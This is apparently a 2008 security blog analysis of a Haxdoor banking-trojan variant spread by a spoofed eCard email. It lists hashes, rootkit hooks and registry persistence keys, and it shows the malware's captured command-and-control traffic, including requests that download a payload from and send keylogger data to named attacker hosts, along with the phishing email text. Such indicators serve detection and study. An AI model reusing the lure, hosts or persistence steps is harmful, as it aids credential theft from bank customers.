Haxdoor ecard

On 11 November 2008, I received an email indicating that I had received an ecard.

Date: Tue, 11 Nov 2008 19:29:36 +0000
From: "123greetings.com" (spoofed)
To: "my love" <.....@gmail.com>
Subject: You have received an eCard

Good day.
You have received an eCard

To pick up your eCard, choose from any of the following options:
Click on the following link (or copy & paste it into your web browser):

hxxp://zonzamas.info/ecard.exe

Your card will be aviailable for pick-up beginning for the next 30 days.
Please be sure to view your eCard before the days are up!

We hope you enjoy you eCard.

Thank You!

hxxp://www.123greetings.com

The email included a hyperlink for hxxp://zonzamas.info/ecard.exe. The file ecard.exe is a variant of the Haxdoor malcode family. The domain zonzamas.info is currently registered and hosted in the US (65.98.31.250).

ecard.exe
934fce496508b5dc4ba01f140870d01c
34,440 bytes

The malware ecard.exe creates the following files:

C:\WINDOWS\system32\gzipmod.dll
C:\WINDOWS\system32\vbagz.sys

gzipmod.dll
603ed7f0758bb2957aa94b3e7bd758b2
20,108 bytes

vbagz.sys
3aec76486842e41459e1edd79570b224
7,072 bytes

Both Haxdoor files install as rootkits hiding themselves from the Windows API.

>SSDT State
NtCreateProcess
Actual Address 0xF8B0CFE9
Hooked by: C:\WINDOWS\system32\vbagz.sys

NtCreateProcessEx
Actual Address 0xF8B0CA86
Hooked by: C:\WINDOWS\system32\vbagz.sys

NtOpenKey
Actual Address 0xF8B0C467
Hooked by: C:\WINDOWS\system32\vbagz.sys

NtOpenProcess
Actual Address 0xF8B0C799
Hooked by: C:\WINDOWS\system32\vbagz.sys

NtQueryDirectoryFile
Actual Address 0xF8B0C7EF
Hooked by: C:\WINDOWS\system32\vbagz.sys


>Files
Suspect File: C:\WINDOWS\system32\gzipmod.dll Status: Hidden
Suspect File: C:\WINDOWS\system32\vbagz.sys Status: Hidden
>Hooks
ntoskrnl.exe-->IoCreateFile, Type: Inline - RelativeJump at address 0x80583218 hook handler located in [vbagz.sys]
ntoskrnl.exe-->IoGetCurrentProcess, Type: Inline - RelativeJump at address 0x804EDE00 hook handler located in [vbagz.sys]

[1476]RootkitRevealer.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1476]RootkitRevealer.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
[1724]svchost.exe-->ntdll.dll-->LdrLoadDll, Type: Inline - RelativeJump at address 0x77F55669 hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->HttpOpenRequestA, Type: Inline - RelativeJump at address 0x76206C0A hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump at address 0x76210689 hook handler located in [gzipmod.dll]
[1724]svchost.exe-->wininet.dll-->InternetCloseHandle, Type: Inline - RelativeJump at address 0x7620974B hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetConnectA, Type: Inline - RelativeJump at address 0x76205DE6 hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetOpenA, Type: Inline - RelativeJump at address 0x7621017D hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetQueryDataAvailable, Type: Inline - RelativeJump at address 0x7620FC5E hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
!!POSSIBLE ROOTKIT ACTIVITY DETECTED!! =)


The malware gzipmod.dll creates:

C:\WINDOWS\System32\ answxt.bin
C:\WINDOWS\System32\k86.bin

K86.bin stores keylogger data. The following log shows examples of logon attempts at USBank and Wachovia.

00000159 00000159 0 ==================Google - Microsoft Internet Explorer ; MOD:C:\Program Files\Internet Explorer\iexplore.exe
000001C7 000001C7 0 usbank Enter 123456671988wachovia Enter 1234567 Tab pass123usbank Enter 12121212pass123456

The following registry keys are created to load gzipmod.dll at startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache
Persistent = 0x00000000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\gzipmod
DllName = "gzipmod.dll"
Startup = "gzipmod"
Impersonate = 0x00000001
Asynchronous = 0x00000001
MaxWait = 0x00000001
adr9i = "[6B1ADFD9D971359EA]"


The following registry keys are created to load vbagz.sys during a safe-mode boot:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vbagz.sys "(Default)"
Type: REG_SZ
Data: Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vbagz.sys "(Default)"
Type: REG_SZ
Data: Driver

The following registry entries are set, affecting internet security:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\System32\rundll32.exe"
Type: REG_SZ
Data: C:\WINDOWS\System32\rundll32.exe:*:Enabled:rundll32

The following registry entries install vbagz.sys as a service named “VBA2 PnP Driver”

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "DisplayName"
Type: REG_SZ
Data: VBA2 PnP Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "ImagePath"
Type: REG_EXPAND_SZ
Data: system32\vbagz.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Start"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_VBAGZ\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Security "Security"
Type: REG_BINARY
Data: [hexadecimal values]

The malware connects to cash-babules.com/bolt2/data.php?trackid. The domain cash-babules.com is registered and hosted in Russia (62.167.16.11, SINGER-NET). The request returns instructions to download hxxp://sergej-grienko.com/inj/11-11.bin. The domain sergej-grienko.com is also registered and hosted in Russia (62.167.16.11, SINGER-NET). The 11-11.bin file is saved as C:\WINDOWS\System32\tremir.bin. The bin file stores instructions for creating fake banking institution logon html pages and keylogger triggers.

GET /ie-bolt2/data.php?trackid=[string] HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.6043-201935)
Host: cash-babules.com Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Wed, 12 Nov 2008 03:52:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.6

CMND UU0 U4hxxp://sergej-grienko.com/inj/11-11.bin
U4sergej-grienko.com/inj/11-11.bin ED |END



GET /inj/11-11.bin HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.6043-201935)
Host: sergej-grienko.com


Keylogger and harvested data is exfiltrated to cash-babules.com/ie-bolt2/data.php.

POST /ie-bolt2/data.php?dt=0&id=4569 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.11731-201935)
Host: cash-babules.com
Content-Length: 725
Content-Type: multipart/form-data; boundary=---------------------------
Connection: Keep-Alive
Pragma: no-cache
Content-Disposition: form-data; name="user" [string]
Content-Disposition: form-data; name="info"